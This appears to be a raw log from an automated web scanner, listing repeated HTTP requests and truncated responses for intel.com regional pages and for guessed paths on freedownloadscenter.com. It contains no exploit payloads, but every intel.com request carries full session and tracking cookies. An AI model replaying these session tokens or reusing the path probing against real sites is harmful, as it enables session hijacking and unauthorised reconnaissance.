<html> <head><title>503 Service Temporarily Unavailable</title></head> <body bgcolor="white"> <center><h1>503 Service Temporarily Unavailable</h1></center> <hr><center>nginx/0.7.65</center> </bod ...[SNIP]...
GET /Search/function.join HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 503 Service Temporarily Unavailable Server: Apache/2.2.3 (CentOS) Date: Sun, 06 Feb 2011 01:51:24 GMT Content-Type: text/html Content-Length: 573 Connection: close
<html> <head><title>503 Service Temporarily Unavailable</title></head> <body bgcolor="white"> <center><h1>503 Service Temporarily Unavailable</h1></center> <hr><center>nginx/0.7.65</center> </bod ...[SNIP]...
GET /mybeta/Search/newsearch.php3 HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 503 Service Temporarily Unavailable Server: Apache/2.2.3 (CentOS) Date: Sun, 06 Feb 2011 01:51:26 GMT Content-Type: text/html Content-Length: 573 Connection: close
<html> <head><title>503 Service Temporarily Unavailable</title></head> <body bgcolor="white"> <center><h1>503 Service Temporarily Unavailable</h1></center> <hr><center>nginx/0.7.65</center> </bod ...[SNIP]...
GET /sites/sitewide/hat/40recode HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 404 Not Found Content-Length: 6268 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 23:15:16 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US"> <head> <title>Page Not Found</title>
GET /business/enterprise/emea/deu/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" ETag: "1b25d468e03acb1:4305" Last-Modified: Fri, 13 Aug 2010 12:09:41 GMT Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:03 GMT Content-Length: 90 Connection: close
GET /business/enterprise/emea/eng/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" ETag: "60ee4e29e933cb1:440d" Last-Modified: Wed, 04 Aug 2010 15:24:42 GMT Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:04 GMT Content-Length: 90 Connection: close
GET /business/enterprise/emea/fra/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" ETag: "e8fb4c2df3acb1:440d" Last-Modified: Fri, 13 Aug 2010 12:05:02 GMT Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:04 GMT Content-Length: 90 Connection: close
GET /business/enterprise/emea/ita/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" ETag: "56706231845cb1:440d" Last-Modified: Thu, 26 Aug 2010 12:12:54 GMT Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:04 GMT Content-Length: 90 Connection: close
GET /business/enterprise/emea/nld/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" ETag: "5dc5fd5ca5bcb1:440d" Last-Modified: Fri, 24 Sep 2010 09:28:23 GMT Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:04 GMT Content-Length: 72 Connection: close
GET /business/enterprise/emea/pol/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" ETag: "c91818f61745cb1:4305" Last-Modified: Thu, 26 Aug 2010 12:12:32 GMT Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:05 GMT Content-Length: 90 Connection: close
GET /business/enterprise/emea/rus/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" ETag: "40f22c2de03acb1:4305" Last-Modified: Fri, 13 Aug 2010 12:08:01 GMT Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:06 GMT Content-Length: 91 Connection: close
GET /business/enterprise/emea/spa/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" ETag: "c2c6b88aaa3fcb1:4558" Last-Modified: Thu, 19 Aug 2010 14:26:41 GMT Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:08 GMT Content-Length: 90 Connection: close
GET /business/enterprise/emea/swe/index.htm?iid=gg_sv_SE+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" ETag: "603d723dd150cb1:4305" Last-Modified: Fri, 10 Sep 2010 10:16:31 GMT Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:11 GMT Content-Length: 93 Connection: close
GET /business/enterprise/emea/tur/index.htm?iid=gg_tr_TR+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
